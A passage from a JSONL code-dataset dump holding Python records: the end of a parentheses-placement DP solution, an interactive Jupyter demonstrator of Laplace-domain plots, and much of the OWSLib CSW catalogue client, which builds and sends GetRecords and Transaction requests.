\n    for s in range(1,n):\n        for i in range(n-s):\n            j = i+s\n            m[i][j], M[i][j] = MinAndMax(i,j)\n    return M[0][n-1]\n\n\nif __name__ == \"__main__\":\n    print(get_maximum_value(input()))\n","sub_path":"algorithmic_toolbox/week5/programs/placing_parentheses/placing_parentheses.py","file_name":"placing_parentheses.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"512370785","text":"from IPython.display import display\nimport ipywidgets as ipw\nimport numpy as np\nimport bqplot as bqp\nimport ipyvolume as ipv\nimport asyncio\nfrom time import time\n\n# helper functions\ndef amplitude(sigma, omega):\n    return(np.sqrt(sigma**2 + omega**2))\n\n# throttling as per https://ipywidgets.readthedocs.io/en/latest/examples/Widget%20Events.html\n\nclass Timer:\n    def __init__(self, timeout, callback):\n        self._timeout = timeout\n        self._callback = callback\n        self._task = asyncio.ensure_future(self._job())\n\n    async def _job(self):\n        await asyncio.sleep(self._timeout)\n        self._callback()\n\n    def cancel(self):\n        self._task.cancel()\n\ndef throttle(wait):\n    \"\"\" Decorator that prevents a function from being called\n    more than once every wait period. \"\"\"\n    def decorator(fn):\n        time_of_last_call = 0\n        scheduled = False\n        new_args, new_kwargs = None, None\n        def throttled(*args, **kwargs):\n            nonlocal new_args, new_kwargs, time_of_last_call, scheduled\n            def call_it():\n                nonlocal new_args, new_kwargs, time_of_last_call, scheduled\n                time_of_last_call = time()\n                fn(*new_args, **new_kwargs)\n                scheduled = False\n            time_since_last_call = time() - time_of_last_call\n            new_args = args\n            new_kwargs = kwargs\n            if not scheduled:\n                new_wait = max(0, wait - time_since_last_call)\n                Timer(new_wait, call_it)\n                scheduled = True\n        return throttled\n    return decorator\n\n# sliders styling and whatnot\ndef initialize(isContinousUpdateOn, tArray, yArray, s1Array, s2Array, s1Grid, s2Grid, Y1Array, Y2Array, YPoles, YZeros, y, Y):\n\ttSlider = ipw.FloatSlider(\n\t\tvalue=tArray[0],\n\t\tmin=np.min(tArray),\n\t\tmax=np.max(tArray),\n\t\tdescription='$t$:',\n\t\tdisabled=False,\n\t\tstep=tArray[1] - tArray[0],\n\t\treadout=True,\n\t\treadout_format='.2f',\n\t\tcontinuous_update=isContinousUpdateOn,\n\t\tlayout=ipw.Layout(width='100%', height='80px'),\n\t)\n\tySlider = ipw.FloatSlider(\n\t\tvalue=yArray[0],\n\t\tmin=np.min(yArray),\n\t\tmax=np.max(yArray),\n\t\tdescription='$y$:',\n\t\tdisabled=True,\n\t\treadout=True,\n\t\treadout_format='.4f',\n\t\tcontinuous_update=isContinousUpdateOn,\n\t\tlayout=ipw.Layout(width='100%', height='80px'),\n\t)\n\ts1Slider = ipw.FloatSlider(\n\t\tvalue=s1Array[0],\n\t\tmin=np.min(s1Array),\n\t\tmax=np.max(s1Array),\n\t\tdescription='Real[$s$]:',\n\t\tdisabled=False,\n\t\tstep=s1Array[1] - s1Array[0],\n\t\treadout=True,\n\t\treadout_format='.2f',\n\t\tcontinuous_update=isContinousUpdateOn,\n\t\tlayout=ipw.Layout(width='50%', height='80px'),\n\t)\n\ts2Slider = ipw.FloatSlider(\n\t\tvalue=s2Array[0],\n\t\tmin=np.min(s2Array),\n\t\tmax=np.max(s2Array),\n\t\tdescription='Imag[$s$]:',\n\t\tdisabled=False,\n\t\tstep=s2Array[1] - s2Array[0],\n\t\treadout=True,\n\t\treadout_format='.2f',\n\t\tcontinuous_update=isContinousUpdateOn,\n\t\tlayout=ipw.Layout(width='50%', height='80px'),\n\t)\n\tY1Slider = ipw.FloatSlider(\n\t\tvalue=Y1Array[0,0],\n\t\tmin=np.nanmin(Y1Array[Y1Array != -np.inf]),\n\t\tmax=np.nanmax(Y1Array[Y1Array != 
np.inf]), \n\t\tdescription='Real[$Y(s)$]:',\n\t\tdisabled=True,\n\t\treadout=True,\n\t\treadout_format='.4f',\n\t\tcontinuous_update=isContinousUpdateOn,\n\t\tlayout=ipw.Layout(width='50%', height='80px'), \n\t)\n\tY2Slider = ipw.FloatSlider(\n\t\tvalue=Y2Array[0,0],\n\t\tmin=np.nanmin(Y2Array[Y2Array != -np.inf]), \n\t\tmax=np.nanmax(Y2Array[Y2Array != np.inf]), \n\t\tdescription='Imag[$Y(s)$]:',\n\t\tdisabled=True,\n\t\treadout=True,\n\t\treadout_format='.4f',\n\t\tcontinuous_update=isContinousUpdateOn,\n\t\tlayout=ipw.Layout(width='50%', height='80px'), \n\t)\n\tfourierCheckbox = ipw.Checkbox(\n\t\tvalue=False,\n\t\tdescription='Fourier Mode',\n\t\tdisabled=False,\n\t\tindent=False\n\t)\n\tshowPolesCheckbox = ipw.Checkbox(\n\t\tvalue=True,\n\t\tdescription='Show poles',\n\t\tdisabled=False,\n\t\tindent=False\n\t)\n\tshowZerosCheckbox = ipw.Checkbox(\n\t\tvalue=True,\n\t\tdescription='Show zeros',\n\t\tdisabled=False,\n\t\tindent=False\n\t)\n\n\tanimDuration = 100\n\tcenterAxisLineOffset = 1\n\thalfWidthFigLayout = ipw.Layout(width='50%', height='400px')\n\n\t# t->y(t) plot\n\txSc = bqp.LinearScale()\n\tySc = bqp.LinearScale()\n\txAxis = bqp.Axis(label='t', scale=xSc, tick_format='0.0f', grid_lines='none')\n\tyAxis = bqp.Axis(label='y(t)', scale=ySc, orientation='vertical', tick_format='0.1f', grid_lines='none')\n\tyLine = bqp.Lines(x=tArray, y=yArray, scales={'x': xSc, 'y': ySc}, labels=['y'], display_legend=True)\n\tyPoint = bqp.Scatter(x=[tSlider.value], y=[ySlider.value], scales={'x': xSc, 'y': ySc}, default_size=128)\n\t#label = bqp.Label(x=[tArray[0]], y=[yArray[0]], scales={'x': xSc, 'y': ySc}, x_offset = 5, y_offset = 5, text=['{:.4f}'.format(yArray[0])])\n\ttyFig = bqp.Figure(axes=[xAxis, yAxis], marks=[yLine, yPoint], title='y(t) = {:.4f}'.format(yArray[0]), layout=ipw.Layout(width='90%', height='400px'), animation_duration=animDuration)\n\n\t# s plot\n\ts1Sc = bqp.LinearScale()\n\ts1Sc.min = np.min(s1Array)\n\ts1Sc.max = np.max(s1Array)\n\ts2Sc = bqp.LinearScale()\n\ts2Sc.min = np.min(s2Array)\n\ts2Sc.max = np.max(s2Array)\n\ts1Axis = bqp.Axis(label='Real', scale=s1Sc, tick_format='0.0f', grid_lines='none')\n\ts2Axis = bqp.Axis(label='Imaginary', scale=s2Sc, orientation='vertical', tick_format='0.0f', grid_lines='none')\n\tsRealLine = bqp.Lines(x=[s1Sc.min - centerAxisLineOffset, s1Sc.max + centerAxisLineOffset], y=[0,0], scales={'x': s1Sc, 'y': s2Sc}, colors=['black'], stroke_width=0.5)\n\tsImagLine = bqp.Lines(x=[0,0], y=[s2Sc.min - centerAxisLineOffset, s2Sc.max + centerAxisLineOffset], scales={'x': s1Sc, 'y': s2Sc}, colors=['black'], stroke_width=0.5)\n\tinputPoint = bqp.Scatter(x=[s1Slider.value], y=[s2Slider.value], scales={'x': s1Sc, 'y': s2Sc}, enable_move=True, colors=['red'])\n\tdragHint = bqp.Label(x=[0], y=[s2Sc.max], scales={'x': s1Sc, 'y': s2Sc}, x_offset = -30, y_offset = 0, text=['Drag me!'])\n\tpoles = bqp.Scatter(x=YPoles.real, y=YPoles.imag, scales={'x': s1Sc, 'y': s2Sc}, colors=['black'], marker='cross', stroke_width=0.5)\n\tzeros = bqp.Scatter(x=YZeros.real, y=YZeros.imag, scales={'x': s1Sc, 'y': s2Sc}, colors=['black'], marker='circle', stroke_width=0.5)\n\tsFig = bqp.Figure(axes=[s1Axis, s2Axis], marks=[sImagLine, zeros, poles, dragHint, inputPoint], title='s = {:.2f}, {:.2f}j'.format(s1Slider.value, s2Slider.value), layout=halfWidthFigLayout, animation_duration=animDuration)\n\n\t# Y(t) plots\n\tY1Sc = bqp.LinearScale()\n\tY1Sc.min = -1 #np.min(Y1Array)\n\tY1Sc.max = 1 #np.max(Y1Array)\n\tY2Sc = bqp.LinearScale()\n\tY2Sc.min = -1 
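\n\t# The output-plane scales are pinned to a fixed [-1, 1] window; the data-driven\n\t# bounds are left commented out. Presumably this keeps the Y(s) marker readable\n\t# near poles, where |Y(s)| diverges.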
#np.min(Y2Array)\n\tY2Sc.max = 1 #np.max(Y2Array)\n\tY1Axis = bqp.Axis(label='Real', scale=Y1Sc, tick_format='0.0f', grid_lines='none')\n\tY2Axis = bqp.Axis(label='Imaginary', scale=Y2Sc, orientation='vertical', tick_format='0.0f', grid_lines='none')\n\tYRealLine = bqp.Lines(x=[Y1Sc.min - centerAxisLineOffset, Y1Sc.max + centerAxisLineOffset], y=[0,0], scales={'x': Y1Sc, 'y': Y2Sc}, colors=['black'], stroke_width=0.5)\n\tYImagLine = bqp.Lines(x=[0,0], y=[Y2Sc.min - centerAxisLineOffset, Y2Sc.max + centerAxisLineOffset], scales={'x': Y1Sc, 'y': Y2Sc}, colors=['black'], stroke_width=0.5)\n\toutputPoint = bqp.Scatter(x=[Y1Slider.value], y=[Y2Slider.value], scales={'x': Y1Sc, 'y': Y2Sc})\n\tYFig = bqp.Figure(axes=[Y1Axis, Y2Axis], marks=[YRealLine, YImagLine, outputPoint], title='Y(s) = {:.2f}, {:.2f}j'.format(Y1Slider.value, Y2Slider.value), layout=halfWidthFigLayout, animation_duration=animDuration)\n\n\n\t# freq->amplitude plot\n\tr1, r2 = Y(s1Slider.value, s2Array)\n\tampArray = amplitude(r1, r2)\n\n\tfreqSc = bqp.LinearScale()\n\tampSc = bqp.LinearScale()\n\tfreqAxis = bqp.Axis(label='Frequency (Imag[s])', scale=freqSc, tick_format='.0f', grid_lines='none')\n\tampAxis = bqp.Axis(label='Amplitude', scale=ampSc, orientation='vertical', tick_format='.1f', grid_lines='none')\n\tampLine = bqp.Lines(x=s2Array, y=ampArray, scales={'x': freqSc, 'y': ampSc})\n\tampPoint = bqp.Scatter(x=[s2Slider.value], y=[amplitude(Y1Slider.value, Y2Slider.value)], scales={'x': freqSc, 'y': ampSc}, default_size=128)\n\tfreqampFig = bqp.Figure(axes=[freqAxis, ampAxis], marks=[ampLine, ampPoint], title='Amplitude[Y(s)] = {:.2f}'.format(amplitude(Y1Slider.value, Y2Slider.value)), layout=halfWidthFigLayout, animation_duration=animDuration)\n\n\t# EXPERIMENTAL\n\t# 3d amplitude plot\n\tamp3dFig = ipv.figure(xlabel='Real[s]', ylabel='Amplitude[Y(s)]', zlabel='Imag[s]', title='Amplitude[Y(s)] = {:.2f}'.format(amplitude(Y1Slider.value, Y2Slider.value)), layout=ipw.Layout(width='50%', height='600px'), animation_duration=animDuration)\n\ttemp = np.array(amplitude(np.ravel(Y1Array), np.ravel(Y2Array)))\n\tampGrid = temp.reshape(Y1Array.shape)\n\tamp3dPoint = ipv.scatter(x=np.array([s1Slider.value]), y=np.array([amplitude(Y1Slider.value, Y2Slider.value)]), z=np.array([s2Slider.value]), marker='sphere', size=5, color='blue')\n\tamp3dSurface = ipv.plot_surface(x=s1Grid, y=ampGrid, z=s2Grid, color=\"skyblue\")\n\t#\n\n\t@throttle(0.5)\n\tdef handle_tSlider(change):\n\t\ttValue = change['new']\n\t\tupdateRealDomain(tValue)\n\n\tdef updateRealDomain(tValue): \n\t\tyValue = y(tValue)\n\t\tySlider.value = yValue\n\t\tyPoint.x = [tValue]\n\t\tyPoint.y = [yValue]\n\t\ttyFig.title = 'y(t) = {:.4f}'.format(yValue)\n\n\t@throttle(0.5) \n\tdef handle_s1Slider(change):\n\t\ts1Value = change['new']\n\t\ts2Value = s2Slider.value\n\t\tupdateComplexDomain(s1Value, s2Value)\n\t\t\n\t@throttle(0.5) \n\tdef handle_s2Slider(change):\n\t\ts1Value = s1Slider.value\n\t\ts2Value = change['new'] \n\t\tupdateComplexDomain(s1Value, s2Value)\n\t\t\n\t@throttle(0.5)\n\tdef handle_dragging(name, value):\n\t\ts1Slider.value = value['point']['x']\n\t\ts2Slider.value = value['point']['y']\n\t\tdragHint.text = ['']\n\n\tdef handle_fourierCheckbox(change):\n\t\tif change['new'] == True:\n\t\t\ts1Slider.value = 0\n\t\t\ts1Slider.disabled = True\n\t\t\tinputPoint.restrict_y = True\n\t\telse:\n\t\t\ts1Slider.disabled = False\n\t\t\tinputPoint.restrict_y = False\n\t\t\t\n\tdef updateComplexDomain(s1Value, s2Value):\n\t\t# input plot\n\t\tinputPoint.x = 
[s1Value]\n\t\tinputPoint.y = [s2Value]\n\t\tsFig.title = 's = {:.2f}, {:.2f}j'.format(s1Value, s2Value)\n\t\t\n\t\t# output plot\n\t\tY1Value, Y2Value = Y(s1Value, s2Value)\n\t\toutputPoint.visible = True\n\t\t\n\t\tif(Y1Value > Y1Slider.max or Y1Value < Y1Slider.min):\n\t\t\tY1Slider.readout = False\n\t\t\toutputPoint.visible = False\n\t\telse:\n\t\t\tY1Slider.readout = True \n\t\t\t\n\t\tif(Y2Value > Y2Slider.max or Y2Value < Y2Slider.min):\n\t\t\tY2Slider.readout = False\n\t\t\toutputPoint.visible = False\n\t\telse:\n\t\t\tY2Slider.readout = True\n\n\t\tY1Slider.value = Y1Value\n\t\tY2Slider.value = Y2Value\n\t\toutputPoint.x = [Y1Value]\n\t\toutputPoint.y = [Y2Value]\n\t\tYFig.title = 'Y(s) = {:.2f}, {:.2f}j'.format(Y1Value, Y2Value)\n\t\t\n\t\t# fourier plot\n\t\tr1, r2 = Y(s1Value, s2Array)\n\t\tampArray = amplitude(r1, r2)\n\t\tampLine.y = ampArray\n\t\tampPoint.x = [s2Value] \n\t\tampPoint.y = [amplitude(Y1Value, Y2Value)]\n\t\tfreqampFig.title = 'Amplitude[Y(s)] = {:.2f}'.format(amplitude(Y1Value, Y2Value))\n\t\t\n\t\t# 3d amplitude plot\n\t\tamp3dPoint.x = np.array([s1Value])\n\t\tamp3dPoint.z = np.array([s2Value])\n\t\tamp3dPoint.y = np.array([amplitude(Y1Slider.value, Y2Slider.value)])\n\t\t\n\t# event links\n\ttSlider.observe(handle_tSlider, names='value')\n\ts1Slider.observe(handle_s1Slider, names='value') \n\ts2Slider.observe(handle_s2Slider, names='value') \n\tfourierCheckbox.observe(handle_fourierCheckbox, names='value') \n\tinputPoint.on_drag_end(handle_dragging) \n\t\n\tdisplaybox = ipw.VBox([\n\t\tipw.VBox([ipw.HBox([tSlider, ySlider]), tyFig]),\n\t\tipw.VBox([ipw.HBox([s1Slider, Y1Slider]), \n\t\tipw.HBox([s2Slider, Y2Slider]), \n\t\tipw.HBox([fourierCheckbox])]),\n\t\t#ipw.HBox([fourierCheckbox, showPolesCheckbox, showZerosCheckbox])]), \n\t\tipw.HBox([sFig, YFig]), ipw.HBox([freqampFig, amp3dFig])]\n\t)\n\treturn displaybox","sub_path":"week2_domains/domains_demonstrator.py","file_name":"domains_demonstrator.py","file_ext":"py","file_size_in_byte":11591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"577145450","text":"# -*- coding: ISO-8859-15 -*-\n# =============================================================================\n# Copyright (c) 2009 Tom Kralidis\n#\n# Authors : Tom Kralidis \n#\n# Contact email: tomkralidis@gmail.com\n# =============================================================================\n\n\"\"\" CSW request and response processor \"\"\"\n\nimport inspect\nimport warnings\nfrom io import BytesIO\nimport random\nfrom urllib.parse import urlencode\n\nfrom owslib.etree import etree\nfrom owslib import fes\nfrom owslib import util\nfrom owslib import ows\nfrom owslib.iso import MD_Metadata, FC_FeatureCatalogue\nfrom owslib.fgdc import Metadata\nfrom owslib.dif import DIF\nfrom owslib.gm03 import GM03\nfrom owslib.namespaces import Namespaces\nfrom owslib.util import cleanup_namespaces, bind_url, add_namespaces, OrderedDict, Authentication, openURL, http_post\n\n# default variables\noutputformat = 'application/xml'\n\n\ndef get_namespaces():\n n = Namespaces()\n return n.get_namespaces()\n\n\nnamespaces = get_namespaces()\nschema = 'http://schemas.opengis.net/csw/2.0.2/CSW-discovery.xsd'\nschema_location = '%s %s' % (namespaces['csw'], schema)\n\n\nclass CatalogueServiceWeb(object):\n \"\"\" csw request class \"\"\"\n def __init__(self, url, lang='en-US', version='2.0.2', timeout=10, skip_caps=False,\n username=None, password=None, auth=None):\n \"\"\"\n\n Construct and process a 
GetCapabilities request\n\n Parameters\n ----------\n\n - url: the URL of the CSW\n - lang: the language (default is 'en-US')\n - version: version (default is '2.0.2')\n - timeout: timeout in seconds\n - skip_caps: whether to skip GetCapabilities processing on init (default is False)\n - username: username for HTTP basic authentication\n - password: password for HTTP basic authentication\n - auth: instance of owslib.util.Authentication\n\n \"\"\"\n if auth:\n if username:\n auth.username = username\n if password:\n auth.password = password\n self.url = util.clean_ows_url(url)\n self.lang = lang\n self.version = version\n self.timeout = timeout\n self.auth = auth or Authentication(username, password)\n self.service = 'CSW'\n self.exceptionreport = None\n self.owscommon = ows.OwsCommon('1.0.0')\n\n if not skip_caps: # process GetCapabilities\n # construct request\n\n data = {'service': self.service, 'version': self.version, 'request': 'GetCapabilities'}\n\n self.request = urlencode(data)\n\n self._invoke()\n\n if self.exceptionreport is None:\n self.updateSequence = self._exml.getroot().attrib.get('updateSequence')\n\n # ServiceIdentification\n val = self._exml.find(util.nspath_eval('ows:ServiceIdentification', namespaces))\n if val is not None:\n self.identification = ows.ServiceIdentification(val, self.owscommon.namespace)\n else:\n self.identification = None\n # ServiceProvider\n val = self._exml.find(util.nspath_eval('ows:ServiceProvider', namespaces))\n if val is not None:\n self.provider = ows.ServiceProvider(val, self.owscommon.namespace)\n else:\n self.provider = None\n # ServiceOperations metadata\n self.operations = []\n for elem in self._exml.findall(util.nspath_eval('ows:OperationsMetadata/ows:Operation', namespaces)):\n self.operations.append(ows.OperationsMetadata(elem, self.owscommon.namespace))\n self.constraints = {}\n for elem in self._exml.findall(util.nspath_eval('ows:OperationsMetadata/ows:Constraint', namespaces)):\n self.constraints[elem.attrib['name']] = ows.Constraint(elem, self.owscommon.namespace)\n self.parameters = {}\n for elem in self._exml.findall(util.nspath_eval('ows:OperationsMetadata/ows:Parameter', namespaces)):\n self.parameters[elem.attrib['name']] = ows.Parameter(elem, self.owscommon.namespace)\n\n # FilterCapabilities\n val = self._exml.find(util.nspath_eval('ogc:Filter_Capabilities', namespaces))\n self.filters = fes.FilterCapabilities(val)\n\n def describerecord(self, typename='csw:Record', format=outputformat):\n \"\"\"\n\n Construct and process DescribeRecord request\n\n Parameters\n ----------\n\n - typename: the typename to describe (default is 'csw:Record')\n - format: the outputFormat (default is 'application/xml')\n\n \"\"\"\n\n # construct request\n node0 = self._setrootelement('csw:DescribeRecord')\n node0.set('service', self.service)\n node0.set('version', self.version)\n node0.set('outputFormat', format)\n node0.set('schemaLanguage', namespaces['xs2'])\n node0.set(util.nspath_eval('xsi:schemaLocation', namespaces), schema_location)\n etree.SubElement(node0, util.nspath_eval('csw:TypeName', namespaces)).text = typename\n\n self.request = node0\n\n self._invoke()\n\n # parse result\n # TODO: process the XML Schema (you're on your own for now with self.response)\n\n def getdomain(self, dname, dtype='parameter'):\n \"\"\"\n\n Construct and process a GetDomain request\n\n Parameters\n ----------\n\n - dname: the value of the Parameter or Property to query\n - dtype: whether to query a parameter (parameter) or property (property)\n\n \"\"\"\n\n 
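# example (hypothetical parameter name, not from this file):\n        #   csw.getdomain('GetRecords.resultType')\n        # afterwards, self.results['values'] lists the server-advertised domain values.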
# construct request\n dtypename = 'ParameterName'\n node0 = self._setrootelement('csw:GetDomain')\n node0.set('service', self.service)\n node0.set('version', self.version)\n node0.set(util.nspath_eval('xsi:schemaLocation', namespaces), schema_location)\n if dtype == 'property':\n dtypename = 'PropertyName'\n etree.SubElement(node0, util.nspath_eval('csw:%s' % dtypename, namespaces)).text = dname\n\n self.request = node0\n\n self._invoke()\n\n if self.exceptionreport is None:\n self.results = {}\n\n val = self._exml.find(util.nspath_eval('csw:DomainValues', namespaces)).attrib.get('type')\n self.results['type'] = util.testXMLValue(val, True)\n\n val = self._exml.find(util.nspath_eval('csw:DomainValues/csw:%s' % dtypename, namespaces))\n self.results[dtype] = util.testXMLValue(val)\n\n # get the list of values associated with the Domain\n self.results['values'] = []\n\n for f in self._exml.findall(util.nspath_eval('csw:DomainValues/csw:ListOfValues/csw:Value', namespaces)):\n self.results['values'].append(util.testXMLValue(f))\n\n def getrecords(self, qtype=None, keywords=[], typenames='csw:Record', propertyname='csw:AnyText', bbox=None,\n esn='summary', sortby=None, outputschema=namespaces['csw'], format=outputformat, startposition=0,\n maxrecords=10, cql=None, xml=None, resulttype='results'):\n \"\"\"\n\n Construct and process a GetRecords request\n\n Parameters\n ----------\n\n - qtype: type of resource to query (i.e. service, dataset)\n - keywords: list of keywords\n - typenames: the typeNames to query against (default is csw:Record)\n - propertyname: the PropertyName to Filter against\n - bbox: the bounding box of the spatial query in the form [minx,miny,maxx,maxy]\n - esn: the ElementSetName 'full', 'brief' or 'summary' (default is 'summary')\n - sortby: property to sort results on\n - outputschema: the outputSchema (default is 'http://www.opengis.net/cat/csw/2.0.2')\n - format: the outputFormat (default is 'application/xml')\n - startposition: requests a slice of the result set, starting at this position (default is 0)\n - maxrecords: the maximum number of records to return. No records are returned if 0 (default is 10)\n - cql: common query language text. Note this overrides bbox, qtype, keywords\n - xml: raw XML request. 
Note this overrides all other options\n - resulttype: the resultType 'hits', 'results', 'validate' (default is 'results')\n\n \"\"\"\n\n warnings.warn(\"\"\"Please use the updated 'getrecords2' method instead of 'getrecords'.\n The 'getrecords' method will be upgraded to use the 'getrecords2' parameters\n in a future version of OWSLib.\"\"\")\n\n if xml is not None:\n self.request = etree.fromstring(xml)\n val = self.request.find(util.nspath_eval('csw:Query/csw:ElementSetName', namespaces))\n if val is not None:\n esn = util.testXMLValue(val)\n else:\n # construct request\n node0 = self._setrootelement('csw:GetRecords')\n if etree.__name__ != 'lxml.etree': # apply nsmap manually\n node0.set('xmlns:ows', namespaces['ows'])\n node0.set('xmlns:gmd', namespaces['gmd'])\n node0.set('xmlns:dif', namespaces['dif'])\n node0.set('xmlns:fgdc', namespaces['fgdc'])\n node0.set('outputSchema', outputschema)\n node0.set('outputFormat', format)\n node0.set('version', self.version)\n node0.set('resultType', resulttype)\n node0.set('service', self.service)\n if startposition > 0:\n node0.set('startPosition', str(startposition))\n node0.set('maxRecords', str(maxrecords))\n node0.set(util.nspath_eval('xsi:schemaLocation', namespaces), schema_location)\n\n node1 = etree.SubElement(node0, util.nspath_eval('csw:Query', namespaces))\n node1.set('typeNames', typenames)\n\n etree.SubElement(node1, util.nspath_eval('csw:ElementSetName', namespaces)).text = esn\n\n self._setconstraint(node1, qtype, propertyname, keywords, bbox, cql, None)\n\n if sortby is not None:\n fes.setsortby(node1, sortby)\n\n self.request = node0\n\n self._invoke()\n\n if self.exceptionreport is None:\n self.results = {}\n\n # process search results attributes\n val = self._exml.find(\n util.nspath_eval('csw:SearchResults', namespaces)).attrib.get('numberOfRecordsMatched')\n self.results['matches'] = int(util.testXMLValue(val, True))\n val = self._exml.find(\n util.nspath_eval('csw:SearchResults', namespaces)).attrib.get('numberOfRecordsReturned')\n self.results['returned'] = int(util.testXMLValue(val, True))\n val = self._exml.find(util.nspath_eval('csw:SearchResults', namespaces)).attrib.get('nextRecord')\n self.results['nextrecord'] = int(util.testXMLValue(val, True))\n\n # process list of matching records\n self.records = OrderedDict()\n\n self._parserecords(outputschema, esn)\n\n def getrecordbyid(self, id=[], esn='full', outputschema=namespaces['csw'], format=outputformat):\n \"\"\"\n\n Construct and process a GetRecordById request\n\n Parameters\n ----------\n\n - id: the list of Ids\n - esn: the ElementSetName 'full', 'brief' or 'summary' (default is 'full')\n - outputschema: the outputSchema (default is 'http://www.opengis.net/cat/csw/2.0.2')\n - format: the outputFormat (default is 'application/xml')\n\n \"\"\"\n\n # construct request\n data = {\n 'service': self.service,\n 'version': self.version,\n 'request': 'GetRecordById',\n 'outputFormat': format,\n 'outputSchema': outputschema,\n 'elementsetname': esn,\n 'id': ','.join(id),\n }\n\n self.request = urlencode(data)\n\n self._invoke()\n\n if self.exceptionreport is None:\n self.results = {}\n self.records = OrderedDict()\n self._parserecords(outputschema, esn)\n\n def getrecords2(self, constraints=[], sortby=None, typenames='csw:Record', esn='summary',\n outputschema=namespaces['csw'], format=outputformat, startposition=0,\n maxrecords=10, cql=None, xml=None, resulttype='results'):\n \"\"\"\n\n Construct and process a GetRecords request\n\n Parameters\n ----------\n\n - 
constraints: the list of constraints (OgcExpression from owslib.fes module)\n - sortby: an OGC SortBy object (SortBy from owslib.fes module)\n - typenames: the typeNames to query against (default is csw:Record)\n - esn: the ElementSetName 'full', 'brief' or 'summary' (default is 'summary')\n - outputschema: the outputSchema (default is 'http://www.opengis.net/cat/csw/2.0.2')\n - format: the outputFormat (default is 'application/xml')\n - startposition: requests a slice of the result set, starting at this position (default is 0)\n - maxrecords: the maximum number of records to return. No records are returned if 0 (default is 10)\n - cql: common query language text. Note this overrides bbox, qtype, keywords\n - xml: raw XML request. Note this overrides all other options\n - resulttype: the resultType 'hits', 'results', 'validate' (default is 'results')\n\n \"\"\"\n\n if xml is not None:\n self.request = etree.fromstring(xml)\n val = self.request.find(util.nspath_eval('csw:Query/csw:ElementSetName', namespaces))\n if val is not None:\n esn = util.testXMLValue(val)\n val = self.request.attrib.get('outputSchema')\n if val is not None:\n outputschema = util.testXMLValue(val, True)\n else:\n # construct request\n node0 = self._setrootelement('csw:GetRecords')\n if etree.__name__ != 'lxml.etree': # apply nsmap manually\n node0.set('xmlns:ows', namespaces['ows'])\n node0.set('xmlns:gmd', namespaces['gmd'])\n node0.set('xmlns:dif', namespaces['dif'])\n node0.set('xmlns:fgdc', namespaces['fgdc'])\n node0.set('outputSchema', outputschema)\n node0.set('outputFormat', format)\n node0.set('version', self.version)\n node0.set('service', self.service)\n node0.set('resultType', resulttype)\n if startposition > 0:\n node0.set('startPosition', str(startposition))\n node0.set('maxRecords', str(maxrecords))\n node0.set(util.nspath_eval('xsi:schemaLocation', namespaces), schema_location)\n\n node1 = etree.SubElement(node0, util.nspath_eval('csw:Query', namespaces))\n node1.set('typeNames', typenames)\n\n etree.SubElement(node1, util.nspath_eval('csw:ElementSetName', namespaces)).text = esn\n\n if any([len(constraints) > 0, cql is not None]):\n node2 = etree.SubElement(node1, util.nspath_eval('csw:Constraint', namespaces))\n node2.set('version', '1.1.0')\n flt = fes.FilterRequest()\n if len(constraints) > 0:\n node2.append(flt.setConstraintList(constraints))\n # Now add a CQL filter if passed in\n elif cql is not None:\n etree.SubElement(node2, util.nspath_eval('csw:CqlText', namespaces)).text = cql\n\n if sortby is not None and isinstance(sortby, fes.SortBy):\n node1.append(sortby.toXML())\n\n self.request = node0\n\n self._invoke()\n\n if self.exceptionreport is None:\n self.results = {}\n\n # process search results attributes\n val = self._exml.find(\n util.nspath_eval('csw:SearchResults', namespaces)).attrib.get('numberOfRecordsMatched')\n self.results['matches'] = int(util.testXMLValue(val, True))\n val = self._exml.find(\n util.nspath_eval('csw:SearchResults', namespaces)).attrib.get('numberOfRecordsReturned')\n self.results['returned'] = int(util.testXMLValue(val, True))\n val = self._exml.find(util.nspath_eval('csw:SearchResults', namespaces)).attrib.get('nextRecord')\n if val is not None:\n self.results['nextrecord'] = int(util.testXMLValue(val, True))\n else:\n warnings.warn(\"\"\"CSW Server did not supply a nextRecord value (it is optional), so the client\n should page through the results in another way.\"\"\")\n # For more info, see:\n # https://github.com/geopython/OWSLib/issues/100\n 
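# one client-side paging sketch under these semantics (illustrative only):\n                #   start = 0\n                #   while start < csw.results['matches']:\n                #       csw.getrecords2(constraints=[...], startposition=start, maxrecords=10)\n                #       start += csw.results['returned']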
self.results['nextrecord'] = None\n\n            # process list of matching records\n            self.records = OrderedDict()\n\n            self._parserecords(outputschema, esn)\n\n    def transaction(self, ttype=None, typename='csw:Record', record=None, propertyname=None, propertyvalue=None,\n                    bbox=None, keywords=[], cql=None, identifier=None):\n        \"\"\"\n\n        Construct and process a Transaction request\n\n        Parameters\n        ----------\n\n        - ttype: the type of transaction: 'insert', 'update', 'delete'\n        - typename: the typename to describe (default is 'csw:Record')\n        - record: the XML record to insert\n        - propertyname: the RecordProperty/PropertyName to Filter against\n        - propertyvalue: the RecordProperty Value to Filter against (for updates)\n        - bbox: the bounding box of the spatial query in the form [minx,miny,maxx,maxy]\n        - keywords: list of keywords\n        - cql: common query language text. Note this overrides bbox, qtype, keywords\n        - identifier: record identifier. Note this overrides bbox, qtype, keywords, cql\n\n        \"\"\"\n\n        # construct request\n        node0 = self._setrootelement('csw:Transaction')\n        node0.set('version', self.version)\n        node0.set('service', self.service)\n        node0.set(util.nspath_eval('xsi:schemaLocation', namespaces), schema_location)\n\n        validtransactions = ['insert', 'update', 'delete']\n\n        if ttype not in validtransactions:  # invalid transaction\n            raise RuntimeError('Invalid transaction \\'%s\\'.' % ttype)\n\n        node1 = etree.SubElement(node0, util.nspath_eval('csw:%s' % ttype.capitalize(), namespaces))\n\n        if ttype != 'update':\n            node1.set('typeName', typename)\n\n        if ttype == 'insert':\n            if record is None:\n                raise RuntimeError('Nothing to insert.')\n            node1.append(etree.fromstring(record))\n\n        if ttype == 'update':\n            if record is not None:\n                node1.append(etree.fromstring(record))\n            else:\n                if propertyname is not None and propertyvalue is not None:\n                    node2 = etree.SubElement(node1, util.nspath_eval('csw:RecordProperty', namespaces))\n                    etree.SubElement(node2, util.nspath_eval('csw:Name', namespaces)).text = propertyname\n                    etree.SubElement(node2, util.nspath_eval('csw:Value', namespaces)).text = propertyvalue\n                self._setconstraint(node1, None, propertyname, keywords, bbox, cql, identifier)\n\n        if ttype == 'delete':\n            self._setconstraint(node1, None, propertyname, keywords, bbox, cql, identifier)\n\n        self.request = node0\n\n        self._invoke()\n        self.results = 